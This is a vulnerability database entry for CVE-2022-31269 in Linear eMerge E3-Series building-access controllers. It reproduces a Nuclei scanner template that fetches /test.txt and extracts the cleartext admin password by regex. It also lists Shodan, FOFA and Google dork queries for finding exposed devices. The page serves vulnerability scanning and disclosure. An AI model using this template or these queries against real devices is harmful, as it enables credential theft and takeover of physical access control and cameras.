Lucene search
ProjectDiscoveryNUCLEI:CVE-2022-31269HistoryAug 11, 2022 - 5:26 a.m.
Linear eMerge E3-Series - Information Disclosure
2022-08-1105:26:52
ProjectDiscovery
github.com
3
8.2 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
LOW
Integrity Impact
HIGH
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:N
8.1 High
AI Score
Confidence
High
0.003 Low
EPSS
Percentile
68.9%
Linear eMerge E3-Series devices are susceptible to information disclosure. Admin credentials are stored in clear text at the endpoint /test.txt in situations where the default admin credentials have been changed. An attacker can obtain admin credentials, access the admin dashboard, control building access and cameras, and access employee information.
id: CVE-2022-31269
info:
name: Linear eMerge E3-Series - Information Disclosure
author: For3stCo1d
severity: high
description: |
Linear eMerge E3-Series devices are susceptible to information disclosure. Admin credentials are stored in clear text at the endpoint /test.txt in situations where the default admin credentials have been changed. An attacker can obtain admin credentials, access the admin dashboard, control building access and cameras, and access employee information.
impact: |
An attacker can exploit this vulnerability to gain sensitive information from the device.
remediation: |
Apply the latest firmware update provided by the vendor to fix the vulnerability.
reference:
- https://packetstormsecurity.com/files/167990/Nortek-Linear-eMerge-E3-Series-Credential-Disclosure.html
- https://www.nortekcontrol.com/access-control/
- https://eg.linkedin.com/in/omar-1-hashem
- https://nvd.nist.gov/vuln/detail/CVE-2022-31269
- https://github.com/ARPSyndicate/cvemon
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:N
cvss-score: 8.2
cve-id: CVE-2022-31269
cwe-id: CWE-798
epss-score: 0.00284
epss-percentile: 0.68595
cpe: cpe:2.3:o:nortekcontrol:emerge_e3_firmware:*:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: nortekcontrol
product: emerge_e3_firmware
shodan-query:
- http.title:"Linear eMerge"
- http.title:"emerge"
- http.title:"linear emerge"
fofa-query:
- title="emerge"
- title="linear emerge"
google-query:
- intitle:"linear emerge"
- intitle:"emerge"
tags: cve,cve2022,emerge,exposure,packetstorm,nortekcontrol
http:
- method: GET
path:
- "{{BaseURL}}/test.txt"
matchers-condition: and
matchers:
- type: word
words:
- "ID="
- "Password="
condition: and
- type: word
part: header
words:
- text/plain
- type: status
status:
- 200
extractors:
- type: regex
regex:
- Password='(.+?)'
# digest: 4b0a00483046022100828642e6284c8301465a13b70bd9c75b280c9a0199b366a1faabd12a036adef7022100c53d82ca5afdbec4cbb40e00d055cb7120a008c235983a0e494fbd28770eedd1:922c64590222798bb761d5b6d8e72950Related
githubexploit
githubexploit
packetstorm
packetstorm
Nortek Linear eMerge E3-Series Credential Disclosure
2022-08-08 00:00:00
zdt
zdt
Nortek Linear eMerge E3-Series Credential Disclosure Vulnerability
2022-08-08 00:00:00
cvelist
cvelist
CVE-2022-31269
2022-08-25 21:59:52
nvd
nvd
CVE-2022-31269
2022-08-25 22:15:08
prion
prion
Default credentials
2022-08-25 22:15:00
cve
cve
CVE-2022-31269
2022-08-25 22:15:08
8.2 High
CVSS3
Attack Vector
NETWORK
Attack Complexity
LOW
Privileges Required
NONE
User Interaction
NONE
Scope
UNCHANGED
Confidentiality Impact
LOW
Integrity Impact
HIGH
Availability Impact
NONE
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:N
8.1 High
AI Score
Confidence
High
0.003 Low
EPSS
Percentile
68.9%
Related for NUCLEI:CVE-2022-31269